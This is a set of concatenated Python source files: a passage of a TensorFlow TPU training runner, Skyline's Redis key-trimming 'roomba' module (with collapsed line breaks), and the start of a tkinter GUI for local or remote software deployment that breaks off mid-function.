    self.infeed_queue = []
    self.enqueue_ops = []
    self.dataset_initializer = []
    self.iterations = iterations
    self.sess = None
    self.input_sess = None
    self.infeed_thread = None
    if train_steps % iterations != 0:
      train_steps = iterations * int(math.ceil(train_steps / iterations))
    self.train_steps = train_steps
    self.input_graph = tf.Graph()
    tpu_init = [tpu.initialize_system()]
    self.tpu_shutdown = tpu.shutdown_system()
    self.cluster_resolver = tf.contrib.cluster_resolver.TPUClusterResolver(
        FLAGS.tpu or FLAGS.master,
        zone=FLAGS.tpu_zone,
        project=FLAGS.gcp_project)
    self.config = tf.ConfigProto(
        operation_timeout_in_ms=600 * 60 * 1000,
        graph_options=tf.GraphOptions(
            rewrite_options=rewriter_config_pb2.RewriterConfig(
                disable_meta_optimizer=True)),
        isolate_session_state=True)
    cluster_spec = self.cluster_resolver.cluster_spec()
    if cluster_spec:
      self.config.cluster_def.CopyFrom(cluster_spec.as_cluster_def())
    self.init_sess = tf.Session(
        self.cluster_resolver.get_master(), config=self.config)
    self.init_sess.run(tpu_init)

  def device_for_host(self, task=0, cpu=0):
    job_name = FLAGS.tpu_job_name or "tpu_worker"
    return "/job:%s/task:%d/device:CPU:%d" % (job_name, task, cpu)

  def build_enqueue_ops(self, input_fn, params, host_id):
    """Build enqueue operations for the input pipeline in a given host.

    Args:
      input_fn: dataset input graph generation function
      params: input function parameters
      host_id: host identifier
    """
    iparams = {}
    iparams["batch_size"] = params["batch_size"] // FLAGS.num_cores
    iparams["dataset_num_shards"] = FLAGS.num_cores // FLAGS.tpu_cores_per_host

    def get_enqueue_ops_fn():
      """Generate the enqueue ops graph function."""
      iparams["dataset_index"] = host_id
      dataset = input_fn(iparams)
      iterator = dataset.make_initializable_iterator()
      self.dataset_initializer.append(iterator.initializer)

      def enqueue_ops_fn():
        """Generate the infeed enqueue ops graph."""
        per_host_sharded_inputs = []
        control_deps = []
        with tf.device(self.device_for_host(task=host_id)):
          for _ in range(FLAGS.tpu_cores_per_host):
            with tf.control_dependencies(control_deps):
              features, labels = iterator.get_next()
            self.feature_structure["features"] = features
            self.feature_structure["labels"] = labels
            flattened_inputs = data_nest.flatten(self.feature_structure)
            control_deps.extend(flattened_inputs)
            per_host_sharded_inputs.append(flattened_inputs)

          infeed = tpu.InfeedQueue(
              number_of_tuple_elements=len(per_host_sharded_inputs[0]))
          self.infeed_queue.append(infeed)
          return infeed.generate_enqueue_ops(
              per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_fn)

      return enqueue_ops_fn

    with self.input_graph.as_default():
      with tf.device(self.device_for_host(host_id)):
        self.enqueue_ops.append(
            wrap_computation_in_while_loop(
                get_enqueue_ops_fn(), n=self.train_steps,
                parallel_iterations=1))

  def initialize(self, input_fn, model_fn, params):
    """Build graphs for the TPU device and the input pipelines.

    Args:
      input_fn: Dataset input graph generation function
      model_fn: Model definition function
      params: Parameters to input and model functions
    """
    tf.logging.info("TrainRunner: initialize method")

    def infeed_thread_fn():
      """Build and infeed session.run calls in a background thread."""
      i = 1
      while i < FLAGS.num_cores // FLAGS.tpu_cores_per_host:
        self.build_enqueue_ops(input_fn, params, i)
        i += 1
      # Build infeed session
      self.input_sess = tf.Session(
          self.cluster_resolver.get_master(),
          graph=self.input_graph,
          config=self.config)
      self.input_sess.run(self.dataset_initializer)
      # Run infeed session.run calls
      self.input_sess.run([self.enqueue_ops])

    self.build_enqueue_ops(input_fn, params, 0)

    def get_tpu_step(mparams):
      """Get the TPU graph generation function."""

      def tpu_step(loss):
        """Generate the TPU graph."""
        del loss
        values = self.infeed_queue[0].generate_dequeue_op(tpu_device=0)
        unflattened_inputs = data_nest.pack_sequence_as(self.feature_structure,
                                                        values)
        features = unflattened_inputs["features"]
        labels = unflattened_inputs["labels"]
        estimator_spec = model_fn(features, labels, tf.estimator.ModeKeys.TRAIN,
                                  mparams)
        loss, train_op = estimator_spec.loss, estimator_spec.train_op
        with tf.device(device_for_tpu_core()):
          with tf.control_dependencies([train_op]):
            return tf.identity(loss)

      return tpu_step

    tpu_step = get_tpu_step(params)

    @tpu_function.on_device_training_loop
    def tpu_loop():
      return tpu.repeat(self.iterations, tpu_step, [_INITIAL_LOSS])

    (self.loss,) = tpu.shard(
        tpu_loop,
        inputs=[],
        num_shards=FLAGS.num_cores,
        outputs_from_all_shards=False,
    )
    initializer = tf.global_variables_initializer()
    self.saver = tf.train.Saver()
    graph_io.write_graph(tf.Graph().as_graph_def(add_shapes=True),
                         FLAGS.model_dir, "graph.pbtxt")

    # Build tpu train model session and initialize graph
    self.sess = tf.Session(
        self.cluster_resolver.get_master(), config=self.config)
    self.sess.run(initializer)

    # Complete infeed graph generation and session.run calls
    self.infeed_thread = threading.Thread(target=infeed_thread_fn)
    self.infeed_thread.start()

  def train(self, num_threads=2):
    """Run the Train steps on the TPU device.

    Args:
      num_threads: number of outstanding checkpointing threads
    """

    def checkpoint_thread_fn(saver, sess):
      saver.save(sess, FLAGS.model_dir + "/model.ckpt-%d" % (cur_step))

    cur_step = 0
    thread_id = 0
    checkpoint_threads = []
    tf.logging.info("TrainRunner: step %d", cur_step)
    for i in range(num_threads):
      checkpoint_threads.append(None)
    while cur_step < self.train_steps:
      start = time.time()
      tf.logging.info("TrainRunner: start next %d steps", self.iterations)
      cur_step += self.iterations
      loss = self.sess.run([self.loss])
      if checkpoint_threads[thread_id] is not None:
        checkpoint_threads[thread_id].join()
      checkpoint_threads[thread_id] = threading.Thread(
          target=checkpoint_thread_fn, args=(self.saver, self.sess))
      checkpoint_threads[thread_id].start()
      thread_id += 1
      if thread_id >= num_threads:
        thread_id = 0
      end = time.time()
      tf.logging.info(
          "TrainRunner: step {} loss {} step time {} sec {} examples/sec"
          .format(cur_step, loss, end - start,
                  self.iterations * FLAGS.train_batch_size / (end - start)))

    self.infeed_thread.join()
    for i in range(num_threads):
      if checkpoint_threads[i] is not None:
        checkpoint_threads[i].join()
        checkpoint_threads[i] = None

  def shutdown(self):
    self.init_sess.run(self.tpu_shutdown)
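# A hedged sketch of how TrainRunner is typically driven: construct it, hand it
# an input_fn/model_fn pair plus params, then train and shut down. The toy
# input_fn/model_fn below are placeholders (not the real ResNet-50 functions),
# and the FLAGS this module reads (num_cores, tpu_cores_per_host, tpu,
# model_dir, train_batch_size, ...) are assumed to be defined by the caller.
import tensorflow as tf


def toy_input_fn(params):
  # Fixed-shape dummy features/labels; TPU infeed requires static shapes.
  features = tf.zeros([params["batch_size"], 8], tf.float32)
  labels = tf.zeros([params["batch_size"]], tf.int32)
  return tf.data.Dataset.from_tensors((features, labels)).repeat()


def toy_model_fn(features, labels, mode, params):
  del params
  logits = tf.layers.dense(features, 10)
  loss = tf.reduce_mean(
      tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels,
                                                     logits=logits))
  # A real TPU model_fn would wrap its optimizer in
  # tf.contrib.tpu.CrossShardOptimizer so gradients are summed across shards.
  train_op = tf.train.GradientDescentOptimizer(0.01).minimize(loss)
  return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op)


def run_toy_training(iterations=100, train_steps=1000, batch_size=1024):
  runner = TrainRunner(iterations=iterations, train_steps=train_steps)
  runner.initialize(toy_input_fn, toy_model_fn, {"batch_size": batch_size})
  runner.train()
  runner.shutdown()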
roomba.py
from __future__ import division # @modified 20191115 - Branch #3262: py3 # from os import kill, getpid from os import kill from redis import StrictRedis, WatchError from multiprocessing import Process from threading import Thread from msgpack import Unpacker, packb try: from types import TupleType except ImportError: eliminated_in_python3 = True from time import time, sleep from math import ceil # import traceback import logging import sys import os.path from os import remove as os_remove sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir)) sys.path.insert(0, os.path.dirname(__file__)) # @modified 20191115 - Branch #3262: py3 # This prevents flake8 E402 - module level import not at top of file if True: import settings # @added 20191030 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 # Added a single functions to deal with Redis connection and the # charset='utf-8', decode_responses=True arguments required in py3 from skyline_functions import get_redis_conn, get_redis_conn_decoded parent_skyline_app = 'horizon' child_skyline_app = 'roomba' skyline_app_logger = '%sLog' % parent_skyline_app logger = logging.getLogger(skyline_app_logger) skyline_app = '%s.%s' % (parent_skyline_app, child_skyline_app) skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, parent_skyline_app) skyline_app_loglock = '%s.lock' % skyline_app_logfile skyline_app_logwait = '%s.wait' % skyline_app_logfile python_version = int(sys.version_info[0]) # @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS # Feature #3480: batch_processing # Feature #3486: analyzer_batch try: from settings import ROOMBA_DO_NOT_PROCESS_BATCH_METRICS except: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS = False try: from settings import BATCH_PROCESSING except: BATCH_PROCESSING = None try: BATCH_PROCESSING_NAMESPACES = list(settings.BATCH_PROCESSING_NAMESPACES) except: BATCH_PROCESSING_NAMESPACES = [] try: from settings import BATCH_PROCESSING_DEBUG except: BATCH_PROCESSING_DEBUG = None class Roomba(Thread): """ The Roomba is responsible for deleting keys older than DURATION. """ def __init__(self, parent_pid, skip_mini): super(Roomba, self).__init__() # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow # @modified 20191030 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 # if settings.REDIS_PASSWORD: # self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH) # else: # self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) # @added 20191030 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 # Added a single functions to deal with Redis connection and the # charset='utf-8', decode_responses=True arguments required in py3 self.redis_conn = get_redis_conn(skyline_app) self.redis_conn_decoded = get_redis_conn_decoded(skyline_app) self.daemon = True self.parent_pid = parent_pid self.skip_mini = skip_mini def check_if_parent_is_alive(self): """ Self explanatory. """ try: kill(self.parent_pid, 0) except: # @added 20201203 - Bug #3856: Handle boring sparsely populated metrics in derivative_metrics # Log warning logger.warning('warning :: parent process is dead') exit(0) def vacuum(self, i, namespace, duration): """ Trim metrics that are older than settings.FULL_DURATION and purge old metrics. 
""" begin = time() logger.info('%s :: started vacuum' % (skyline_app)) # Discover assigned metrics namespace_unique_metrics = '%sunique_metrics' % str(namespace) # @modified 20191030 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 # unique_metrics = list(self.redis_conn.smembers(namespace_unique_metrics)) unique_metrics = list(self.redis_conn_decoded.smembers(namespace_unique_metrics)) # @added 20200727 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS # Feature #3480: batch_processing # Feature #3486: analyzer_batch if ROOMBA_DO_NOT_PROCESS_BATCH_METRICS and BATCH_PROCESSING and BATCH_PROCESSING_NAMESPACES: try: # @modified 20211127 - Feature #4328: BATCH_METRICS_CUSTOM_FULL_DURATIONS # Ensure that known and new batch_processing_metrics are # accounted for # batch_metrics = list(self.redis_conn_decoded.smembers('aet.analyzer.batch_processing_metrics')) batch_metrics1 = list(self.redis_conn_decoded.smembers('aet.analyzer.batch_processing_metrics')) batch_metrics2 = list(self.redis_conn_decoded.smembers('analyzer.batch_processing_metrics')) all_batch_metrics = batch_metrics1 + batch_metrics2 batch_metrics = list(set(all_batch_metrics)) except: logger.error('error - failed to get Redis set aet.analyzer.batch_processing_metrics') batch_metrics = [] if batch_metrics: full_namespace_batch_metrics = [] for base_name in batch_metrics: metric = ''.join((settings.FULL_NAMESPACE, base_name)) full_namespace_batch_metrics.append(metric) del batch_metrics non_batch_unique_metrics = [] for metric in unique_metrics: if metric not in full_namespace_batch_metrics: non_batch_unique_metrics.append(metric) # @modified 20200815 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS # del after log # UnboundLocalError: local variable 'full_namespace_batch_metrics' referenced before assignment # del full_namespace_batch_metrics if non_batch_unique_metrics: logger.info('roomba :: batch_processing :: removing %s batch metrics from unique_metrics' % str(len(full_namespace_batch_metrics))) unique_metrics = non_batch_unique_metrics del non_batch_unique_metrics # @added 20200815 - Feature #3650: ROOMBA_DO_NOT_PROCESS_BATCH_METRICS del full_namespace_batch_metrics keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ROOMBA_PROCESSES))) if i == settings.ROOMBA_PROCESSES: assigned_max = len(unique_metrics) else: assigned_max = min(len(unique_metrics), i * keys_per_processor) assigned_min = (i - 1) * keys_per_processor assigned_keys = range(assigned_min, assigned_max) # Compile assigned metrics assigned_metrics = [unique_metrics[index] for index in assigned_keys] euthanized = 0 blocked = 0 trimmed_keys = 0 active_keys = 0 # @modified 20191016 - Task #3280: Handle py2 xange and py3 range # Branch #3262: py3 # for i in xrange(len(assigned_metrics)): range_list = [] if python_version == 2: for i in xrange(len(assigned_metrics)): range_list.append(i) if python_version == 3: for i in range(len(assigned_metrics)): range_list.append(i) for i in range_list: self.check_if_parent_is_alive() pipe = self.redis_conn.pipeline() now = time() key = assigned_metrics[i] try: # WATCH the key pipe.watch(key) # Everything below NEEDS to happen before another datapoint # comes in. If your data has a very small resolution (<.1s), # this technique may not suit you. raw_series = pipe.get(key) unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = sorted([unpacked for unpacked in unpacker]) # Put pipe back in multi mode pipe.multi() # There's one value. 
Purge if it's too old try: if python_version == 2: if not isinstance(timeseries[0], TupleType): if timeseries[0] < now - duration: pipe.delete(key) pipe.srem(namespace_unique_metrics, key) pipe.execute() euthanized += 1 continue if python_version == 3: if not isinstance(timeseries[0], tuple): if timeseries[0] < now - duration: pipe.delete(key) pipe.srem(namespace_unique_metrics, key) pipe.execute() euthanized += 1 continue except IndexError: continue # Check if the last value is too old and purge if timeseries[-1][0] < now - duration: pipe.delete(key) pipe.srem(namespace_unique_metrics, key) pipe.execute() euthanized += 1 continue # Remove old datapoints and duplicates from timeseries temp = set() temp_add = temp.add delta = now - duration trimmed = [ tuple for tuple in timeseries if tuple[0] > delta and tuple[0] not in temp and not temp_add(tuple[0]) ] # Purge if everything was deleted, set key otherwise if len(trimmed) > 0: # Serialize and turn key back into not-an-array btrimmed = packb(trimmed) if len(trimmed) <= 15: value = btrimmed[1:] elif len(trimmed) <= 65535: value = btrimmed[3:] trimmed_keys += 1 else: value = btrimmed[5:] trimmed_keys += 1 pipe.set(key, value) active_keys += 1 else: pipe.delete(key) pipe.srem(namespace_unique_metrics, key) euthanized += 1 pipe.execute() except WatchError: blocked += 1 assigned_metrics.append(key) except Exception as e: # If something bad happens, zap the key and hope it goes away pipe.delete(key) pipe.srem(namespace_unique_metrics, key) pipe.execute() euthanized += 1 logger.info(e) logger.info('%s :: vacuum Euthanizing %s' % (skyline_app, key)) finally: pipe.reset() logger.info( '%s :: vacuum operated on %s %d keys in %f seconds' % (skyline_app, namespace, len(assigned_metrics), time() - begin)) logger.info('%s :: vaccum %s keyspace is now %d keys' % (skyline_app, namespace, (len(assigned_metrics) - euthanized))) logger.info('%s :: vaccum blocked %d times' % (skyline_app, blocked)) logger.info('%s :: vacuum euthanized %d geriatric keys' % (skyline_app, euthanized)) logger.info('%s :: vacuum processed %d active keys' % (skyline_app, active_keys)) logger.info('%s :: vacuum potentially trimmed %d keys' % (skyline_app, trimmed_keys)) # sleeping in the main process is more CPU efficient than sleeping # in the vacuum def # if (time() - begin < 30): # logger.info(skyline_app + ' :: sleeping due to low run time...') # sleep(10) def run(self): """ Called when process initializes. 
""" # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: os_remove(skyline_app_logwait) except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os_remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) logger.info('%s :: started roomba' % skyline_app) while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error( '%s :: roomba can\'t connect to redis at socket path %s' % (skyline_app, settings.REDIS_SOCKET_PATH)) sleep(10) # @modified 20180519 - Feature #2378: Add redis auth to Skyline and rebrow # @modified 20191115 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 if settings.REDIS_PASSWORD: self.redis_conn = StrictRedis(password=settings.REDIS_PASSWORD, unix_socket_path=settings.REDIS_SOCKET_PATH) else: self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) # @added 20191115 - Bug #3266: py3 Redis binary objects not strings # Branch #3262: py3 self.redis_conn = get_redis_conn(skyline_app) self.redis_conn_decoded = get_redis_conn_decoded(skyline_app) continue # Spawn processes pids = [] for i in range(1, settings.ROOMBA_PROCESSES + 1): if not self.skip_mini: logger.info('%s :: starting vacuum process on mini namespace' % skyline_app) p = Process(target=self.vacuum, args=(i, settings.MINI_NAMESPACE, settings.MINI_DURATION + settings.ROOMBA_GRACE_TIME)) pids.append(p) p.start() logger.info('%s :: starting vacuum process' % skyline_app) p = Process(target=self.vacuum, args=(i, settings.FULL_NAMESPACE, settings.FULL_DURATION + settings.ROOMBA_GRACE_TIME)) pids.append(p) p.start() # Send wait signal to zombie processes # for p in pids: # p.join() # deroomba - kill any lingering vacuum processes # Changed to manage Roomba processes as edge cases related to I/O # wait have been experienced that resulted in Roomba stalling so a # ROOMBA_TIMEOUT setting was added and here we use the pattern # described by http://stackoverflow.com/users/2073595/dano at # http://stackoverflow.com/a/26064238 to monitor and kill any # stalled processes rather than using p.join(TIMEOUT) - 20160505 # @earthgecko ref 1342 logger.info('%s :: allowing vacuum process/es %s seconds to run' % ( skyline_app, str(settings.ROOMBA_TIMEOUT))) start = time() while time() - start <= settings.ROOMBA_TIMEOUT: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - start logger.info('%s :: vacuum processes completed in %.2f' % (skyline_app, time_to_run)) break else: # We only enter this if we didn't 'break' above. 
logger.info('%s :: timed out, killing all Roomba processes' % (skyline_app)) for p in pids: p.terminate() p.join() # sleeping in the main process is more CPU efficient than sleeping # in the vacuum def also roomba is quite CPU intensive so we only # what to run roomba once every minute process_runtime = time() - now # @added 20210513 - Feature #4066: ROOMBA_OPTIMUM_RUN_DURATION try: ROOMBA_OPTIMUM_RUN_DURATION = int(settings.ROOMBA_OPTIMUM_RUN_DURATION) except Exception as e: logger.warn('%s :: roomba failed to determine ROOMBA_OPTIMUM_RUN_DURATION from settings, defaulting to 60 - %s' % ( skyline_app, e)) ROOMBA_OPTIMUM_RUN_DURATION = 60 # @modified 20210513 - Feature #4066: ROOMBA_OPTIMUM_RUN_DURATION # roomba_optimum_run_duration = 60 roomba_optimum_run_duration = ROOMBA_OPTIMUM_RUN_DURATION if process_runtime < roomba_optimum_run_duration: sleep_for = (roomba_optimum_run_duration - process_runtime) logger.info('%s :: sleeping %.2f for due to low run time' % (skyline_app, sleep_for)) sleep(sleep_for)
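# An isolated, hedged sketch of the Redis WATCH/MULTI optimistic-locking
# pattern that vacuum() uses: watch a key, read and trim the msgpack'd
# timeseries, then write it back atomically, treating WatchError as "another
# writer touched the key, retry later". The key name and duration are
# illustrative; header stripping is simplified to the short-array case
# (roomba strips 1, 3 or 5 bytes depending on the trimmed length).
from time import time
from msgpack import Unpacker, packb
from redis import WatchError


def trim_key(redis_conn, key, duration):
    pipe = redis_conn.pipeline()
    try:
        pipe.watch(key)                # optimistic lock on the key
        raw_series = pipe.get(key)     # immediate-execution mode after watch()
        if raw_series is None:
            return True
        unpacker = Unpacker(use_list=False)
        unpacker.feed(raw_series)
        timeseries = sorted(unpacker)
        delta = time() - duration
        trimmed = [point for point in timeseries if point[0] > delta]
        pipe.multi()                   # queue the write-back atomically
        if trimmed:
            pipe.set(key, packb(trimmed)[1:])
        else:
            pipe.delete(key)
        pipe.execute()                 # raises WatchError if the key changed
        return True
    except WatchError:
        return False                   # caller can re-queue the key
    finally:
        pipe.reset()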
Progression.py
from typing import Set from PIL import Image, ImageTk from tkinter.ttk import Style, Progressbar, Combobox from tkinter import messagebox import tkinter import time import subprocess import threading import os import webbrowser import Utils import Settings threading.excepthook = Utils.thread_exceptions class Progression(tkinter.Frame): def __init__(self, parent, controller): tkinter.Frame.__init__(self, parent, bg='white') self.controller = controller self.max_workers = Settings.default_workers self.targets = [] self.kill = False self.first_run = True self.kill_buttons = [] self.execution_is_remote = False self.include_cmd_execution = True self.console_var = tkinter.StringVar(value="Show console") self.remote_var = tkinter.BooleanVar(value=False) self.message_var = tkinter.BooleanVar(value=False) self.use_file_var = tkinter.BooleanVar(value=False) self.workers_var = tkinter.StringVar(value=Settings.default_workers) self.select_computers_var = tkinter.StringVar() self.grid_columnconfigure(0, weight=1) self.grid_rowconfigure(3, weight=1) # Header header = tkinter.Frame(self, bg=Settings.bg_two) header.grid(row=0, sticky='news') header.grid_columnconfigure(1, weight=1) log = tkinter.Button(header, bg=Settings.bg_two, text='Open log', relief='flat', command=self.open_log, fg=Settings.fg_one, cursor='hand2', font=('Verdana', 7), activebackground='white', bd=0) log.grid(row=0, column=0, sticky='w', padx=3) log.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 7, 'underline'), bg='white')) log.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 7, ''), bg=Settings.bg_two)) console = tkinter.Button(header, bg=Settings.bg_two, textvariable=self.console_var, relief='flat', bd=0, command=self.show_hide_console, fg=Settings.fg_one, cursor='hand2', font=('Verdana', 7), activebackground='white') console.grid(row=0, column=1, sticky='w', padx=3) console.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 7, 'underline'), bg='white')) console.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 7, ''), bg=Settings.bg_two)) workers_input = tkinter.Entry( header, width=3, textvariable=self.workers_var, font=('Verdana', 7)) workers_input.grid(row=0, column=3, sticky='e', padx=3) workers_label = tkinter.Label(header, bg=Settings.bg_two, text='Concurrent deployments:', relief='flat', bd=0, font=('Verdana', 7), fg=Settings.fg_one) workers_label.grid(row=0, column=2, sticky='e', padx=3) # Info and options info_label_frame = tkinter.Frame(self, bg='white') info_label_frame.grid(row=1, padx=10, sticky='news', pady=5) info_label_frame.grid_columnconfigure(1, weight=1) self.info_label = tkinter.Label(info_label_frame, bg='white', font=( 'Verdana', 12), relief='flat', text='Initiate deployment') self.info_label.grid(row=0, column=0, sticky='w') self.verify_targets = tkinter.Button(info_label_frame, bg='white', text='Verify ping connections', state='disabled', relief='flat', bd=0, anchor='s', activebackground='white', fg=Settings.fg_one, command=lambda: threading.Thread(target=self.init_deployment, args=(False,), daemon=True).start(), font=('Verdana', 9)) self.verify_targets.grid(row=0, column=1, sticky='e') self.kill_process_button = tkinter.Button(info_label_frame, bg='white', anchor='s', state='disabled', text='Kill open processes', relief='flat', activebackground='white', bd=0, command=lambda: threading.Thread(target=self.kill_running_targets, daemon=True).start(), font=('Verdana', 9)) self.kill_process_button.grid(row=0, column=2, sticky='e') # 
Remote self.remote_frame = tkinter.Frame(self, bg=Settings.bg_one) self.remote_frame.grid(row=2, sticky='news', padx=10) self.remote_frame.columnconfigure(0, weight=3) self.remote_frame.columnconfigure(2, weight=1) self.remote_checkbutton = tkinter.Checkbutton(self.remote_frame, activebackground=Settings.bg_one, text='Remote deployment', font=('Verdana', 8), relief='flat', variable=self.remote_var, fg=Settings.fg_one, bg=Settings.bg_one, cursor='hand2', command=self.set_execution_type, bd=3, anchor='w', width=30) self.remote_checkbutton.grid(row=0, column=0, sticky='ew') self.remote_checkbutton.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 8, 'underline'))) self.remote_checkbutton.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 8, ''))) self.use_file_button = tkinter.Checkbutton(self.remote_frame, text=f'Use targets.txt', font=('Verdana', 8), relief='flat', variable=self.use_file_var, fg=Settings.fg_one, bg=Settings.bg_one, cursor='hand2', activebackground=Settings.bg_one, command=self.update_targets_field, bd=0, anchor='w') self.use_file_button.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 8, 'underline'))) self.use_file_button.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 8, ''))) self.select_computers_button = Combobox( self.remote_frame, textvariable=self.select_computers_var, justify='right', width=3) self.select_computers_button.config(values=list(sorted(set([line.strip("\n") for line in open( Settings.combobox_loc, "r") if len(line.strip("\n")) > 0]))), font=('Verdana', 7)) self.select_computers_button.bind( '<<ComboboxSelected>>', lambda e: self.targets_text.insert("end", f";{self.select_computers_var.get()}")) self.targets_text = tkinter.Text(self.remote_frame, height=1, font=('Verdana', 9), bd=0, bg='white', fg='black', selectbackground='#ccd9e7', selectforeground='black', highlightthickness=0) # Deployment reports total_process_frame = tkinter.Frame(self, bg='white') total_process_frame.grid(row=3, sticky='news', padx=10) total_process_frame.grid_columnconfigure(0, weight=1) total_process_frame.grid_rowconfigure(0, weight=1) progression_canvas_frame = tkinter.Frame(total_process_frame, bg='white', highlightthickness=2, highlightbackground=Settings.bg_one) progression_canvas_frame.grid(row=0, column=0, sticky="news") progression_canvas_frame.grid_columnconfigure(0, weight=1) progression_canvas_frame.grid_rowconfigure(0, weight=1) self.progression_canvas = tkinter.Canvas(progression_canvas_frame, bg='white', scrollregion=(0, 0, 0, 0), highlightthickness=0) self.progression_canvas.grid(row=0, column=0, sticky="news") progression_scrollbar_frame = tkinter.Frame(total_process_frame) progression_scrollbar_frame.grid(row=0, column=1, sticky='news') progression_scrollbar_frame.grid_columnconfigure(0, weight=1) progression_scrollbar_frame.grid_rowconfigure(0, weight=1) progression_scrollbar_v = tkinter.Scrollbar( progression_scrollbar_frame, command=self.progression_canvas.yview) progression_scrollbar_v.grid(sticky='ns') self.progression_canvas.config( yscrollcommand=progression_scrollbar_v.set) # footer footer = tkinter.Frame(self, bg='white') footer.grid(row=4, sticky='news', padx=5, pady=5) style = Style() style.theme_use('alt') style.configure("green.Horizontal.TProgressbar", foreground=Settings.green_three, background=Settings.green_three, troughcolor=Settings.bg_two, thickness=19, highlightthickness=0, troughrelief='flat') self.progressbar = Progressbar( footer, 
style="green.Horizontal.TProgressbar", mode="determinate") self.progressbar.grid(row=0, column=1, padx=5, sticky='ew') footer.columnconfigure(1, weight=1) back_image = ImageTk.PhotoImage(Image.open( Settings.buttonback).resize((50, 50), Image.ANTIALIAS)) back_button = tkinter.Button(footer, relief='flat', image=back_image, bg='white', activebackground='white', command=lambda: controller.start_frame("Selection"), cursor='hand2') back_button.grid(row=0, column=0, sticky='w') back_button.image = back_image start_image = ImageTk.PhotoImage(Image.open( Settings.buttongo).resize((50, 50), Image.ANTIALIAS)) self.start_button = tkinter.Button(footer, bg='white', relief='flat', image=start_image, cursor='hand2', command=lambda: threading.Thread(target=self.init_deployment, daemon=True).start(), activebackground='white') self.start_button.grid(row=0, column=2, sticky='w') self.start_button.image = start_image def show_hide_console(self): if self.console_var.get() == "Show console": self.console_var.set("Hide console") Utils.cmd_visibility(show=True) else: self.console_var.set("Show console") Utils.cmd_visibility(show=False) def open_log(self): if os.path.exists(Settings.logfile): webbrowser.open(Settings.logfile) def update_targets_field(self): if self.use_file_var.get(): self.targets_text.grid_remove() else: self.targets_text.grid( row=1, column=0, sticky='ew', padx=2, columnspan=3, pady=2) def set_execution_type(self): if self.remote_var.get(): self.use_file_button.grid(row=0, column=1, sticky='e', padx=2) self.select_computers_button.grid( row=0, column=2, sticky='ew', padx=2) self.update_targets_field() self.verify_targets.config(state='normal', font=( "Verdana", 9, ""), cursor='hand2') self.verify_targets.bind("<Enter>", lambda event: event.widget.config( font=('Verdana', 9, 'underline'))) self.verify_targets.bind("<Leave>", lambda event: event.widget.config( font=('Verdana', 9, ''))) else: self.targets_text.grid_remove() self.select_computers_button.grid_remove() self.use_file_button.grid_remove() self.use_file_var.set(0) self.verify_targets.config( state='disabled', cursor='arrow', font=("Verdana", 9, "")) self.verify_targets.unbind("<Enter>") self.verify_targets.unbind("<Leave>") def set_targets(self): if self.execution_is_remote: if self.use_file_var.get(): self.targets = list(sorted(set([line.strip("\n") for line in open( Settings.targets_loc, "r") if len(line.strip("\n")) > 0]))) else: self.targets = [i for i in sorted(set(list(self.targets_text.get( "1.0", "end").replace("\n", "").split(";")))) if len(i) > 0] else: self.targets = ['127.0.0.1'] def create_cmd_file(self, cmd_location, sep='\n'): with open(cmd_location, 'w') as cmd: cmd.write(f'@echo off{sep}echo Starting time: %TIME%{sep}') if Settings.install_state == "Textinput": cmd.write(f"{Settings.text}{sep}") else: packages = Settings.installations if Settings.install_state == "Installation" else Settings.deletions for package in packages: if packages[package][0].get(): cmd.write( f"Echo @ {package}{sep}{packages[package][1]}{sep}") cmd.write( f"Echo ^> {Settings.install_state} of {package} ended with ErrorLevel: %ERRORLEVEL%{sep}") cmd.write( f"echo Final ErrorLevel: %ERRORLEVEL%{sep}echo Ending time: %TIME%") def decode(self, line): if b'\x00' in line and not b'\r' in line: return line.decode('utf-16-le', errors='ignore') else: return line.replace(b"\x00\r\x00", b"").decode('utf-8', errors='ignore') def init_target_deployment(self, hostname, status_name_, cmd_output_button, killbutton, connection, errorlevel, runtime, cmd_output, 
